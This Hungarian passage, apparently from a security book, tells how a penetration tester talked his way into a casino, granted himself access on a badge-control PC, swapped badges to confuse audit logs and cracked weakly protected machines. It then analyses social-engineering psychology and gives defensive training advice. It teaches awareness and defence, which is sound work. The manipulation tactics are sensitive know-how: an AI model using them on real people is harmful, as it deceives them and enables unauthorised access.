telefonon beszélgetni, és ez tovább fog tartani, mint gondolná. Húsz
percre állítottam a telefonomon levőstoppert, ez elég idővolt arra, hogy
kutakodjak egy kicsit, de ne keltsem fel még jobban Larry gyanakvását,
aki úgy tűnt, bizalmatlan.
Aki valaha is dolgozott az informatikai osztályon, tudja, hogy a
belépőkártyák egy számítógépes rendszerhez vannak kapcsolva; a
megfelelő PC-hez való hozzáféréssel be lehet állítani, hogy a
belépőkártya az épület bármely részében használható legyen. Whurley
abban reménykedett, hogy megtalálja azt a számítógépet, amelyen a
belépőkártyák belépési jogosultságait szabályozták, így képes lesz
kiterjeszteni a nála levő két kártya „hatókörét”. Fel-le sétált a
folyosókon, az irodákban a belépőkártyákat szabályozó rendszer után
kutatva, de nehezebb falatnak bizonyult megtalálnia, mint gondolta.
Frusztrált volt és felsült.
Úgy döntött, hogy megkérdez valakit, és azt az őrt választotta, aki
olyan barátságos volt a személyzeti bejáratnál. Mostanra nagyon sok
ember látta őt Richarddal, így majdnem minden gyanú teljesen
eloszlott. Whurley megtalálta az őrt, és azt mondta neki, hogy meg kell
néznie az épület belépésszabályozó rendszerét. Az őr azt sem kérdezte,
hogy miért. Minden rendben ment. Megmondta neki, hogy pontosan
hol találja, amit keres.
– Megkerestem a szabályozó rendszert, és besétáltam a kis hálózati
fülkébe, ahol a rendszer futott. Egy PC-t találtam a földön, amelyen a
belépőkártyák listája már meg volt nyitva. Nem volt képernyővédő,
nem volt jelszó – semmi, ami lelassíthatott volt. – Wurley véleménye
szerint ez tipikus volt. – Az emberek azt gondolják, hogy „mihelyt nem
látjuk, nem is gondolunk rá”. Ha egy olyan rendszer, mint ez,
ellenőrzött belépésű területen belül van, akkor azt gondolják, hogy
egyáltalán nem kell törődni a számítógép védelmével.
Azon túlmenően, hogy minden területre érvényes hozzáférést adott
magának, még egy dolgot meg akart csinálni:
Azt gondoltam, hogy csak a vicc kedvéért fogom a másik
belépőkártyát, belépési jogosultságokat adok neki, kicserélem a nevet,
majd elcserélem egy olyan alkalmazott belépőkártyájára, aki fel és alá
közlekedik a kaszinóban, így tudomása nélkül fog segíteni nekem az
ellenőrzőnaplók elcsúfításában. De kit válasszak erre? Hát Megant,
persze – egyszerű lesz vele elcserélni a belépőkártyákat. Csak azt kell
mondani neki, hogy az ellenőrzéshez szükségem van a segítségére.
Amikor Whurley besétált Meganhez, a nő ugyanolyan barátságos
volt, mind mindig. Elmagyarázta, hogy befejezte a tesztet, és vissza
kell vennie a berendezését. Majd azt mondta Megannek, hogy a
segítéségére van szüksége. – A legtöbb social engineer bizonyára
egyetért abban, hogy az emberek túlságosan segítőkészek. – Azt
mondta a nőnek, hogy látnia kell a belépőkártyáját, hogy ellenőrizhesse
a nála levő lista alapján. Néhány másodperccel később Megannek
olyan belépőkártyája volt, amely hamarosan még jobban összezavarja
majd a dolgokat, miközben Whurleynél volt a nő belépőkártyája,
illetve egy olyan kártya, amely vezetőként regisztrálta őt a belépési
naplókban. Amikor Whurley visszatért Larry irodájába, a zaklatott
rendszergazda éppen a feleségével való beszélgetés végén járt. Végül
letette a telefont, és készen állt a tárgyalásuk folytatására. Whurley arra
kérte, hogy részletesen magyarázza el neki a hálózati diagramot, majd
hirtelen félbeszakította, és – hogy lefegyverezze megkérdezte tőle,
hogy állnak a dolgok a feleségével. A két férfi majdnem egy óráig
beszélgetett a házasságról és az élet más dolgairól.
A beszélgetés végén biztos voltam benne, hogy Larry semmilyen
problémát nem fog okozni. így azt magyaráztam Larrynek, hogy a
laptopomon különleges ellenőrzőszoftver van, amit le kell futtatnom a
hálózatukon. Mivel általában felsőkategóriás gépem van, mindig
könnyű a hálózathoz csatlakoztatni, mert nincs olyan számítógépbuzi a
földön, aki ne szeretné működés közben látni.
Egy idő után Larry otthagyta, hogy elintézzen néhány telefonhívást,
és a napi dolgaival foglalkozzon. Amint magára hagyták, Whurley
átkutatta a hálózatot, és a gyenge jelszókezelésnek köszönhetően
sikerült néhány rendszert. Windows-os és Linuxos gépeket egyaránt
feltörnie, majd közel két órát töltött azzal, hogy információkat másolt
le a hálózatról, sőt, egyes elemeket még DVD-re is írt, „amit soha nem
kérdőjeleznek meg”.
Miután végeztem mindezzel, azt gondoltam, hogy vicces és egyúttal
hasznos lenne, ha még valamit megpróbálnék. Odamentem minden
egyes alkalmazotthoz, akivel valamilyen módon kapcsolatba kerültem –
illetve néhány olyanhoz is, akik csak másokkal együtt láttak –, majd
előadtam nekik a következőszöveg valamilyen változatát: „Nos,
befejeztem a munkámat. Figyeljen, megtenne nekem egy szívességet?
Szeretek fényképeket gyűjteni azokról az emberekről és helyekről, ahol
dolgozom. Nem bánná, ha együtt lefényképezkednénk?” Hihetetlenül
könnyen bevették.
Néhányan még azt is felajánlották neki, hogy a szomszédos
irodákban levőkkel is lefotózzák. Volt belépőkártyája, hálózati
diagramja, és hozzáférése a kaszinó hálózatához. És mindent
fényképekkel tudott bizonyítani.
A beszámoló értekezleten a belső ellenőrzés vezetője azt állította,
hogy Whurleynek nem volt joga fizikai módon hozzáférni a
rendszereikhez, mert „nem így támadnák, meg őket”. Azt is mondták
neki, hogy „bűncselekménnyel” határos területre tévedt, és az ügyfél
egyáltalán nem értékelte az akcióját.
Whurley így reagált:
Miért gondolta azt a kaszinó, hogy tisztességtelen voltam? A válasz
egyszerű. Korábban még nem dolgoztam kaszinókkal, és nem voltam
teljesen tisztában a [működésüket szabályozó] rendelkezésekkel A
jelentésem azt eredményezhette, hogy a Szerencsejáték Felügyeletnek
auditálni kell a kaszinó működését, aminek komoly anyagi
következményei lehetnek.
Whurley a neki járó teljes díjazást megkapta, így nem nagyon
bánkódott. Szeretett volna jobb benyomást kelteni az ügyfélben, de azt
érezte, hogy partnereinek kifejezetten nem tetszett az ő megközelítése,
amit tisztességtelennek éreztek magukkal és alkalmazottaikkal
szemben. – Egyértelműen a tudomásomra hozták, hogy a továbbiakban
nem kívánnak engem látni.
Ez korábban még soha nem történt meg vele, az ügyfelei általában
igenis értékelték ellenőrzéseinek eredményeit, és – Whurley szavaival
– „háborús játéknak” tekintették, vagyis elfogadták azt, hogy
ugyanazokkal a módszerekkel teszteli őket, amelyeket egy ellenséges
hacker vagy social engineer is használ. – Az ügyfelek majdnem mindig
beleremegnek az izgalomba. Akárcsak én, legalábbis e megbízás előtt
mindig.
Végeredményben Whurley sikeresnek értékeli ezt a Vegas-i munkát
a tesztelés, ám katasztrofálisnak az ügyfélkezelés tekintetében. –
Valószínűleg soha nem fogok többet Vegas-ban dolgozni – panaszolja.
Kit tudja, hátha a Szerencsejáték Felügyeletnek szüksége lesz egy
olyan etikus hacker biztonsági szolgálataira, aki ismeri a kaszinók
hátsó területein a járást.

BETEKINTÉS

Brad Sagarin társadalom pszichológus, aki a meggyőzés


témakörében végzett kutatásokat, a következőképpen írja le a social
engineer fegyvertárát: „Semmi különleges nincsen a social
engineeringben. A social engineer ugyanazokat a meggyőző
technikákat alkalmazza, amelyeket mindannyian használunk a
mindennapok során. Szerepeket veszünk fel. Hitelességet próbálunk
teremteni. Viszonzandó szívességeket teszünk. A social engineer
azonban manipuláló és megtévesztő, nagyon etikátlan módon
alkalmazza e technikákat – és gyakran elsöprő sikert ér el velük.
Megkértük Dr. Sagarint, hogy írja le a social engineerek által
leggyakrabban használt taktikák mögötti pszichológiai elveket. Egyes
esetekben magyarázatát az előző, A megtévesztés művészete (Perfact-
Pro, 2003) című könyvünkben szereplő olyan történetekkel példázta,
amelyek jól illusztrálták az adott taktikát.
Minden esetben először az elv köznapi, nem tudományos
magyarázatát mondjuk el, illetve egy példát mutatunk be.

Szerepcsapdázás

A social engineer feltárja az álcázás során választott szerepének


viselkedési jellemzőit. Amikor csak néhány jellemvonást látunk egy
szerepből, általában hajlamosak vagyunk hozzáképzelni a többit – egy
felsővezetőnek öltözött férfit látunk, és azt feltételezzük, hogy okos,
elfoglalt és megbízható.
Példa: Amikor Whurley belépett a monitorszobába, úgy volt öltözve,
mint egy vezető, és úgy viselkedett, hogy a szobában levőalkalmazottak
szavait utasításként értelmezzék. Sikeresen magára öltötte a
kaszinómenedzser vagy vezetőszerepét.
A támadó gyakorlatilag minden social engineering támadásnál
szerepcsapdázást használ annak érdekében, hogy a célpont
következtessen a szerep egyéb jellemzőire, és azoknak megfelelően
cselekedjen. A szerep lehet egy informatikusé, egy vásárlóé, egy
újonnan felvett alkalmazotté, illetve bármilyen szerep, amely normális
esetben a kérés teljesítésére ösztönöz. A gyakori csapdázási technikák
közé tartozik a célpont főnökének vagy más alkalmazottak nevének
említése, illetve a cégre vagy az iparágra jellemző terminológia vagy
szakzsargon használata. A személyes támadás esetén a támadó által
választott öltözék, a kiegészítők (egy céges kitűző, egy sportoló
karórája, egy drága toll, egy iskolai gyűrű) vagy az ápoltság (például a
frizura stílusa) szintén csapdák, amelyek a támadó által felvett szerep
hihetőségét sugallják. A módszer hatásossága abból a tényből
következik, hogy ha egyszer elfogadunk valakit valaminek (vezetőnek,
vásárlónak, munkatársnak), akkor következtetni fogunk a többi
jellemvonására (egy vezető gazdag és hatalma van, egy
szoftverfejlesztő műszakilag képzett, de szociálisan alulfejlett, egy
munkatárs bizalomra méltó).
Mennyi információra van szükség, mielőtt az emberek elkezdik
levonni ezeket a következtetéseket? Nem sokra.

Szavahihetőség

A szavahihetőség megteremtése a legtöbb social engineering


támadás első számú lépése, olyan sarokkő, amelyre minden későbbi
épül.
Példa: Whurley azt javasolta Richardnak, egy vezetőbeosztásban
levőinformatikus szakembernek, hogy ők kelten ebédeljenek együtt,
mivel felmérte, hogy a tény, hogy Richarddal együtt látják, megteremti
az ő szavahihetőségét azokban az alkalmazottakban, akik együtt látták
őket.
Dr. Sagarin három olyan módszert azonosított A megtévesztés
művészetében, amelyet a social engineerek a szavahihetőségük
megteremtése céljából használnak. Az első módszer szerint a támadó
olyasvalamit mond, ami látszólag ellenkezik a saját érdekeivel, ahogy
azt A megtévesztés művészete 8. fejezetének „Egyetlen hívás” című
történetében olvashatjuk, amikor a támadó azt mondja áldozatának: –
Most folytassa a jelszavával, de azt ne mondja meg. Soha ne mondja
meg a jelszavát senkinek, még a rendszergazdának sem. – Ez úgy
hangzik, mint egy megbízható valakitől kapott tanács.
A második módszerben a támadó olyan eseményre figyelmezteti a
célpontot, amelyet a támadó (a célpont tudomása nélkül) okozni fog.
Például A megtévesztés művészete 5. fejezetének „Hálózati üzemzavar”
című történetében a támadó elmagyarázza, hogy a hálózati kapcsolat
esetleg leállhat. A támadó ezt követően elkövet valamit, ami miatt az
áldozat valóban elveszíti a hálózati kapcsolatát, és ez az áldozat
szemében a támadó hitelességét teremti meg.
Ezt az előrejelző taktikát gyakran ötvözik a harmadik módszerrel,
amelyben a támadó tovább „bizonyítja” szavahihetőségét azzal, hogy
segít az áldozatnak megoldani a problémát. Ez történt a „Hálózati
üzemzavar” című történetben is, amikor a támadó először
figyelmeztette az áldozatot, hogy a hálózat leállhat, majd valóban
leállította az áldozat kapcsolatát, ahogy azt előre megjósolta, ezt
követően pedig helyreállította a kapcsolatot, és azt állította, hogy ő
„javította ki a hibát”, ezzel bizalmat és hálát keltve áldozatában.

Szerep ráerőltetése a célpontra (Altercasting)

A social engineer alternatív szerep felvételére veszi rá a célszemélyt,


például agresszív viselkedésével erőszakolja ki az engedelmességet.
Példa: Whurley, miközben Lenore-ral beszélget, a szerencsétlen
szerepébe helyezi magát (most szakított a barátnőjével, most költözött a
városba, és munkát keres), hogy a nőt a segítőkész szerepére vegye rá.
A social engineer általában segítőkész szerepbe kényszeríti a
célpontját. Ha valaki egyszer elfogadta a segítőkész szerepet, általában
kényelmetlennek vagy nehéznek találja, hogy visszakozzon belőle.
A ravasz és előrelátó social engineer megpróbálja kitalálni, hogy az
áldozat milyen szerepben érezné magát kényelmesen. Ezt követően
megkísérli úgy irányítani a beszélgetést, hogy a célszemélyt az adott
szerepbe kényszerítse – miként Whurley tette Lenore-ral és Megannel,
amikor érezte, hogy mindketten szívesen lennének segítőkészek. Az
emberek valószínűbben fogadják el a pozitív, őket jó érzéssel eltöltő
szerepeket.
A szisztematikus gondolkodástól való elterelés
A társadalompszichológusok megállapították, hogy az ember kétféle
módon dolgozza fel a bejövő információkat; ezt a két módot
szisztematikusnak és heurisztikusnak nevezik.
Példa: Amikor a rendszergazdának nehéz helyzetet kellett kezelnie a
felkavart feleségével, Whurley a férfi érzelmi állapotát és
nyugtalanságát kihasználva olyan kéréssel állt elő, amely hiteles
alkalmazotti belépőkártyához juttatta.
Dr. Sagarin így magyarázza ezt: – Amikor szisztematikusan
dolgozzuk fel az információt, alaposan és racionálisan gondoljuk meg a
kérést, mielőtt döntést hozunk. Amikor azonban heurisztikusán
gondolkodunk, rövidített szellemi úton hozunk döntéseket. Például az
alapján teljesítünk egy kérést, hogy a kérő kinek adja ki magát, és nem
gondoljuk végig, hogy mennyire bizalmas az információ, amit kér.
Próbálunk szisztematikus módon működni, amikor a szóban forgó
dolog számunkra fontos. Azonban az idő nyomása, a nyugtalanság
vagy az erős érzelmek a heurisztikus mód irányába vihetnek
bennünket.
Szeretjük azt hinni, hogy normális esetben racionálisan, logikusan
gondolkodunk, és a tények alapján hozzuk a döntéseket. Gyakran
idézik Dr. Gregory Neidenet, aki azt mondja: „mi, emberek körülbelül
az idő 90-95 százalékában üresjáraton futtatjuk az agyunkat”.[1] A
social engineerek megpróbálják ezt úgy kihasználni, hogy különböző
befolyásoló módszerek alkalmazásával kiléptetik áldozataikat a
szisztematikus módból – mivel tudják, hogy a heurisztikus módban
működű emberek sokkal kevésbé valószínű, hogy hozzáférnek a
pszichológiai védelmükhöz; sokkal kevésbé valószínű, hogy gyanút
fognak, kérdéseket tesznek fel, vagy akadályokat gördítenek a támadó
elé.
A social engineerek heurisztikus módban levő célpontokat kívánnak
megközelíteni, és ebben a módban kívánják tartani őket. Egyik ilyen
taktika a célpontnak a munkaidő lejárta előtt öt perccel történő
felhívása: arra a tényre építenek, hogy a munkahely időben történő
elhagyása miatti aggodalom olyan kérés teljesítésére ösztönzi a
célpontot, amit egyébként nem tenne meg.

Az engedékenység pillanata

A social engineerek kérések sorát intézik az áldozathoz, ügyelve


arra, hogy mindig ártatlan kérésekkel kezdjék. Ezzel alapozzák meg az
engedékenységet.
Példa: Dr Sagarin A megtévesztés művészete 2. fejezetében szereplő,
„CreditChex” című történetet idézi, amelyben a támadó a kulcskérdést,
azaz a bank telefonon keresztül való azonosításához jelszóként is
használt ügyfélszámra vonatkozó bizalmas kérdést ártalmatlan
kérdések sorának közepébe bújtatja. Mivel az elsőkérdések
ártalmatlannak tűnnek, olyan légkört teremt a támadó, amelyben az
áldozat hajlamos a bizalmasabb információt is ártalmatlanként kezelni.
Richard Levinson televíziós író és producer leghíresebb karaktere, a
Peter Falk által játszott Columbo egyik kedvenc taktikájává tette ezt. A
közönség lenyűgözve nézte, ahogy a detektív, miközben éppen távozni
készült, a gyanúsított pedig – abbéli örömében, hogy bolondot csinált a
nyomozóból – már engedte le a védőfalát, még megáll, és feltesz egy
utolsó kérdést, azt a kulcskérdést, amit a korábbi kérdései sorával
épített fel. A social engineerek gyakran kihasználják ezt a „csak még
valamit” taktikát.

A segítségnyújtás iránti vágy

A pszichológusok azonosították a segítségnyújtás sok ember által


érzett előnyeit. Ha segítséget adunk, erősnek érezhetjük magunkat.
Megszüntetheti rosszkedvűnket. Jó érzéssel tölthet el bennünket. A
social engineerek több módot is találnak arra, hogy kihasználják a
segítőkészségre való hajlamunkat.
Példa: Amikor Whurley megjelent a kaszinó személyzeti bejáratának,
az őr elhitte a mesét a „cicával” való ebédről, kölcsönt adott neki a
randevúra, tanácsokat adott a nők kezelésére vonatkozóan, és nem
ragaszkodott a belépőkártyához, amikor annak felmutatása nélkül
sétált be.
Dr. Sagarin megjegyzi; – Mivel a social engineerek előszeretettel
vesznek célba olyan embereket, akik nem ismerik az általuk kiadott
információ értékét, úgy tűnhet, hogy a segítségük semmibe nem kerül
nekik. (Most mibe kerül végrehajtani egy gyors adatbázis-lekérdezést a
telefon másik végén levő szegény kollégának?)

Társított tulajdonságok

A társított tulajdonságok arra utalnak, ahogy az emberek saját és


mások viselkedését magyarázzák. A social engineer célja annak
elérése, hogy a célpont bizonyos tulajdonságokat társítson hozzá,
például szakértelmet, megbízhatóságot, szavahihetőséget vagy
rokonszenvet.
Példa: Dr. Sagarin A megtévesztés művészete 10. fejezetében
szereplő„Az előléptetésre vágyó hölgy” című történetet idézi. A támadó
fel és alá sétál egy ideig, mielőtt kérné, hogy engedjék be a
tárgyalóterembe; ezzel minden gyanút eloszlat, hiszen az emberek azt
feltételezik, hogy egy behatoló nem mer feleslegesen időzni olyan
helyen, ahol elkaphatják.
Megeshet, hogy egy social engineer odasétál a recepcióshoz, letesz
egy ötdolláros bankjegyet a pultra, és valami ilyesmit mond: – A
földön találtam. Nem szólt senki, hogy elveszített egy kis pénzt? – A
recepciós olyan tulajdonságokat társít a social engineerhez, mint az
őszinteség és megbízhatóság.
Ha azt látjuk, hogy egy férfi tartja az ajtót egy idősebb nő előtt, arra
gondolunk, hogy milyen udvarias; ha a nő fiatal és vonzó, teljesen más
indítékot sejtünk a háttérben.

Rokonszenv

A social engineerek gyakran kihasználják a tényt, hogy mindannyian


nagyobb valószínűséggel adunk pozitív választ az olyan emberektől
érkező kérésekre, akiket kedvelünk.
Példa: Whurley részben azért volt képes hasznos információkat
kiszedni Lenore-ból, akivel a fitnessteremben találkozott, mert nagyon
pontosan figyelte a lány reakcióit, és folyamatosan az ő válaszainak
megfelelően alakította megjegyzéseit. Ez azt sugallta a lánynak, hogy
hasonló ízlésük és érdeklődésük van („Én is!”). Érezvén, hogy kedveli
a férfit, sokkal nyíltabban osztotta meg vele azokat az információkat,
amelyeket Whurley meg akart szerezni tőle.
Az emberek szeretik a hozzájuk hasonlókat, akiknek velük egyező
érdeklődési körük, tanulmányi hátterük és személyes hobbijaik vannak.
A social engineer gyakran utánanéz a célpontja hátterének, és felkészül
arra, hogy érdeklődést tanúsítson az olyan dolgok iránt, amelyeket a
célpont kedvel – vitorlázás vagy tenisz, antik repülőgépek, régi
fegyverek gyűjtése vagy bármi más. A social engineerek bókok és
udvarlás bevetésével is képesek növelni az irántuk érzett rokonszenvet,
a vonzó külsejű social engineerek pedig megjelenésüket használják a
rokonszenv fokozására.
Egy másik taktika a célpont által ismert és kedvelt emberek nevének
megemlítése. Ennél a módszernél a támadó a szervezeten belüli
„csoport” részének próbál tűnni. A hackerek az áldozat lelkének
simogatására használják a bókokat és az udvarlást is, illetve gyakran
olyan embereket vesznek célba a szervezeten belül, akik nemrégiben
jutalmat kaptak valamiért. Az ego simogatása a segítő szerepébe
lökheti a gyanútlan áldozatot.

Félelem

A social engineer néha elhiteti a célszeméllyel, hogy valamilyen


borzalmas dolog fog történni, de a közelgő katasztrófa elkerülhető, ha a
célpont azt teszi, amit a támadó javasol. A támadó ily módon
fegyverként használja a félelmet.
Példa: A megtévesztés művészete 10. fejezetében szereplő„A
rendkívüli javítás” című történetben a támadó azzal ijeszt rá az
áldozatára, hogy értékes adatok elvesztését valószínűsíti, ha az áldozat
nem telepít a cég adatbázisszerverére egy rendkívüli javítást. A félelem
sebezhetővé teszi az áldozatot a social engineer „megoldásával”
szemben.
Az alárendeltségre alapozott támadások gyakran a félelmet
használják ki. A cégvezető szerepébe rejtőző social engineer egy
titkárnőt vagy más alacsony beosztásban levő alkalmazottat keres meg
a „sürgős” utasításával, és azt sugallja, hogy a beosztott bajba kerül
vagy akár ki is rúgják, ha nem működik együtt vele.

Ellenállás

A pszichológiai ellenállás olyan negatív reakció, amit akkor


tapasztalunk, amikor úgy észleljük, hogy választási lehetőségünket
vagy szabadságunkat elveszik. A méltánytalanság okozta keserűség
miatt csökken a helyzetértékelési képességünk, mivel az elveszített
dolog utáni vágy minden mást elhomályosít.
Példa: A megtévesztés művészete című könyv két története is az
ellenállás hatalmát szemlélteti – az egyik az információhoz, a másik
pedig a számítógépekhez való hozzáférés elvesztésén alapul.
Az ellenállásra épített tipikus támadásban a támadó azt mondja
célpontjának, hogy a számítógépes fájlokhoz való hozzáférés egy ideig
nem fog működni, majd megnevezi azt időszakot, amikor a fájlok
teljesen elérhetetlenek lesznek. – Két héten keresztül nem tud majd
hozzáférni a fájljaihoz, azonban mindent elkövetünk, hogy ennél
tovább semmiképpen ne tartson a dolog. – Amikor az áldozat
érzelmileg érintetté válik, a támadó felajánlja, hogy rövidebb idő alatt
helyreállítja a fájlokat, csupán a célszemély felhasználói nevére és
jelszavára van szükség. A célpont, megkönnyebbülvén, hogy
elkerülheti a beígért veszteséget, általában boldogan együttműködik a
támadóval.
Az érem másik oldala a korlátozott rendelkezésre állás elve, amely
valamilyen beígért előnnyel csalogatja a célpontot. Ennek egyik
változatában az áldozatokat egy olyan weboldalra csalják, ahol
ellophatják a bejelentkezési adataikat vagy hitelkártyájuk számát.
Hogyan reagálna egy olyan e-mailre, amely 200 dollárén ajánl egy
vadonatúj Apple iPodot egy adott oldal első 1000 látogatójának?
Felkeresné az oldalt, és regisztrálná önmagát, hogy vegyen egyet? És
amikor e-mail címével bejelentkezik és jelszót választ, ugyanazt a
jelszót fogja használni, mint bárhol másutt?

ÓVINTÉZKEDÉSEK

A social engineering támadások elleni védelem összehangolt lépések


sorozatát igényli; többek között a következő intézkedések meghozatalát
érdemes mérlegelni:
Egyértelmű és pontos biztonsági szabályokat kell kidolgozni, és
végrehajtásukat következetesen be kell tartatni a teljes szervezetben.
Biztonságtudatossági képzéseket kell szervezni.
Egyszerű szabályokkal kell meghatározni, hogy mi tartozik a
bizalmas információk közé.
Hozni kell egy egyszerű szabályt, amely kimondja, hogy amikor
valaki bizalmas művelet végrehajtását kéri (vagy olyan műveletét,
amely számítógéphez kapcsolódó berendezéssel való érintkezést foglal
magába, és a művelet következménye ismeretlen az alkalmazott
számára), a kérést intéző személy személyazonosságát a cég biztonsági
irányelveinek megfelelően ellenőrizni kell.
Adatminősítési irányelveket kell kidolgozni.
Ki kell képezni az alkalmazottakat a social engineering támadások
kivédésének módszereiből.
Biztonsági értékelések végrehajtásával tesztelni kell az
alkalmazottak social engineering támadásokkal szembeni
érzékenységét.
A program legfontosabb eleme a megfelelő biztonsági
rendszabályok kidolgozása, majd az alkalmazottak ösztönzése a
szabályzatok betartására. A következő rész e program és a social
engineeringes fenyegetések elleni küzdelemre felkészítő képzések
megtervezésekor megfontolandó sarokpontokat körvonalazza.

Képzési irányelvek

Következzék a képzésre vonatkozó néhány irányelv:


Tudatosítani kell az alkalmazottakban, hogy a social engineerek
majdnem biztosan megfogják támadni a céget, és talán nem is egyszer
fognak próbálkozni.
Egyáltalán nem biztos, hogy a social engineerek jelentette komoly
fenyegetés köztudomású; sokan még azt sem tudják, hogy e fenyegetés
egyáltalán létezik. Az emberek általában nem számítanak rá, hogy
manipulálják és megtévesztik őket, így a social engineering támadáskor
védtelenek. Bizonyára sok Internet felhasználó találkozott már az
úgynevezett nigériai e-maillel, amelyben egy jelentős pénzösszeg
Nigériából való elutalásához kérnek segítségét, és az összeg valamely
százalékát ajánlják fel a segítségért cserébe. Később azt kérik, hogy
küldjünk némi pénzt az utalási folyamat elindításához. Nemrégiben egy
New York-i hölgy esett bele a csapdába, több százezer dollárt vett
„kölcsön” a munkáltatójától az utalási díj megelőlegezésére. Most
ahelyett, hogy a vadonatúj yachtján múlatná az idejét, szoktatja magát a
gondolathoz, hogy egy szövetségi börtön egyik emeletes ágyán
osztozik majd egy cellatárssal. Az emberek tényleg áldozataivá válnak
ezeknek a social engineering támadásoknak – máskülönben a nigériai
csalók nem küldenének több e-mailt.
Demonstráljuk szerepjátékok segítségével az alkalmazottak social
engineering támadásokkal szembeni sebezhetőségét, és képezzük ki
alkalmazottainkat az ezek elleni módszerekre.
A legtöbb ember a sebezhetetlenség illúziójában él, azt gondolván,
hogy ők túl okosak ahhoz, hogy manipulálják, átverjék, megtévesszék
vagy befolyásolják őket. Azt hiszik, hogy ilyen dolgok csak a „buta”
emberekkel történhetnek. Létezik két módszer, amelyek abban
segítenek az alkalmazottaknak, hogy megértsék saját sebezhetőségüket,
és higgyenek a valós veszélyben. Az egyik módszer szerint néhány
alkalmazottat a biztonságtudatossági szemináriumon való részvételük
előtt „megégetve” demonstráljuk számukra a social engineering
hatásosságát, majd a képzés során elemeztetjük velük a
tapasztalataikat. A másik megközelítés úgy mutatja be a
sebeshetőséget, hogy valódi social engineering esettanulmányok
elemzésével illusztráljuk, hogy az emberek milyen mértékben ki
vannak téve ezeknek a támadásoknak. A képzésen minkét megközelítés
esetén a támadás mechanizmusát kell megvizsgálni, elemezve azt, hogy
miért működhetett, majd meg kell vitatni a résztvevőkkel, hogyan lehet
felismerni és kivédeni az ilyen támadásokat.
Próbáljuk tudatosítani a képzésen részt vevőalkalmazottakban, hogy
ha a képzés után social engineering támadás áldozatává válnak, akkor
kényelmetlenül fogják magukat érezni.
A képzésen hangsúlyozni kell minden egyes alkalmazottnak a
bizalmas céges eszközök védelmében vállalandó felelősségét. Ezen
túlmenően rendkívül fontos, hogy a képzés tematikáját kialakító
szakember felismerje, hogy egyes helyzetekben a biztonsági
szabályzatok betartásának motivációját az adja, ha az alkalmazott
tisztában van vele, hogy miért van szükség azokra a szabályzatokra. A
biztonságtudatossági képzések során az oktatók mondjanak példát arra,
hogy a biztonsági szabályzatok miként védik a céget, és milyen károk
érhetik a szervezetet, ha az alkalmazottak figyelmen kívül hagyják az
előírásokat, vagy hanyag módon viselkednek. Azt is érdemes
hangsúlyozni, hogy egy sikeres social engineering támadás az
alkalmazott, illetve a cégben dolgozó barátai és kollégái személyes
adatait is veszélyeztetheti. A cég emberi erőforrások adatbázisa olyan
személyes információkat tartalmaz, amelyek rendkívül értékesek
lehetnek a személyiségtolvajok számára.
A legjobb ösztönző azonban mégis az, hogy senki nem szereti, ha
manipulálják, megtévesztik vagy becsapják. És így az emberek erősen
motiváltak abban, hogy ne érezzék magukat zavarban vagy butának
azért, mert beleestek a csapdába.

Social engineering elleni programok

A következő sarokpontokat érdemes mérlegelni a programok


kialakítása során:
Dolgozzuk ki az alkalmazottak számára követendőeljárásokat arra
az esetre, ha social engineering támadást ismernek fel vagy
gyanítanak.
Szeretnénk felhívni a kedves olvasók figyelmét A megtévesztés
művészete című könyvben található, biztonsági irányelveket tartalmazó
terjedelmes kézikönyvre. Ezeket az irányelveket útmutatás gyanánt
lehet használni; válogassuk ki azokat, amelyekre szükség van, és
hagyjuk a többit. Amikor a céges eljárásokat kidolgoztuk és érvénybe
léptettük, az információt fel kell rakni a céges intranetre, ahol mindenki
számára gyorsan elérhető. További kiváló forrás Charles Cresson Wood
tanulmánya az információbiztonsági irányelvek kidolgozásáról. A
tanulmány címe: Information Security Policies Made Easy (Sanjose,
CA: Baseline Software, 2001).
Dolgozzunk ki olyan egyszerű irányelveket, amelyek egyértelműen
meghatározzák, hogy a cég mit tekint bizalmas információnak.
Mivel gyakran heurisztikus módban dolgozzuk fel az információkat,
az egyszerű biztonsági szabályok segíthetnek abban, hogy gyanút
fogjunk, amikor bizalmas információ iránti kérést kapunk (például
olyan bizalmas üzleti információt kérnek tőlünk, mint az egyéni
jelszavunk). Ha az alkalmazott felismeri, hogy bizalmas információt
vagy számítógépes művelet végrehajtását kérik tőle, a céges intranet
oldalon levő biztonsági irányelvek kézikönyv segítségével
kiválaszthatja a követendő szabályokat vagy eljárásokat.
Ezenkívül fontos megérteni és az alkalmazottakkal is megértetni,
hogy még a nem bizalmasnak tekintett információ is hasznos lehet a
social engineer számára, aki a látszólag lényegtelen
információmorzsákat összegyűjtve és összerakva olyan ismerethez
juthat, amellyel a szavahihetőség és megbízhatóság illúzióját teremtheti
meg. Egy bizalmas céges projekt projektvezetőjének a neve, a
fejlesztőcsapat fizikai elhelyezkedése, egy adott alkalmazott által
használt szerver neve és a titkos projektekhez rendelt projektnevek
mind igenis fontos információk, és minden cégnek fel kell mérnie a
lehetséges biztonsági fenyegetések elleni védekezésre való igényét. Ez
csak néhány példa a támadó által felhasználható, látszólag lényegtelen
információra. A megtévesztés művészete című könyvben szereplő
jelenetek jól használhatók arra, hogy a képzés résztvevőiben
tudatosítsuk e veszélyt.
Változtassuk meg a cégen belüli udvariassági normákat – Nem gond
azt mondani, hogy „nem”!
A legtöbb ember zavarban van vagy kényelmetlennek érzi, amikor
„nem”-et kell mondania másoknak. (Egy olyan termék jelent meg a
piacon, amely azokat az embereket célozza meg, akik túl udvariasak
ahhoz, hogy a telemarketerek [vagyis olyan értékesítők, akik telefonon
keresztül próbálnak meg eladni valamit] hívásainál letegyék a kagylót.
Amikor egy telemarketer hívja, a felhasználó megnyomja a * gombot,
és leteszi a kagylót; ekkor a következőket mondja az automata a
hívónak: „Elnézést kérek, itt a telefoninas beszél, azt az utasítást
kaptam, hogy tájékoztassam önt arról, hogy a háztartás sajnálattal
elutasítja a megkeresését.” Tetszik nekem ez a sajnálattal szó. De azt
hiszem, érdekes jelenség, hogy sok embernek elektronikus berendezést
kell vásárolnia ahhoz, hogy nemet tudjon mondani. Fizetne ön 50
dollárt egy készülékért, amely megkímélné a nemet mondás
„kényelmetlenségétől”?) A cég social engineeringes képzési
programjának egyik első célja a céges udvariassági normák
átfogalmazása kell hogy legyen. Ebbe az új viselkedésbe tartozik az is,
hogy a bizalmas kéréseket mindaddig – bár udvariasan – el kell
utasítani, amíg az illető személyazonosságát és jogosultságát nem
ellenőrizték. A képzés során javasolni kell ilyen esetekben használható
válaszlehetőségeket, például: „Az X cég alkalmazottjaként mindketten
tudjuk, milyen fontos a biztonsági szabályzatok betartása. így Ön is
megérti, hogy a kérés teljesítése előtt ellenőriznem kell a
személyazonosságát.”
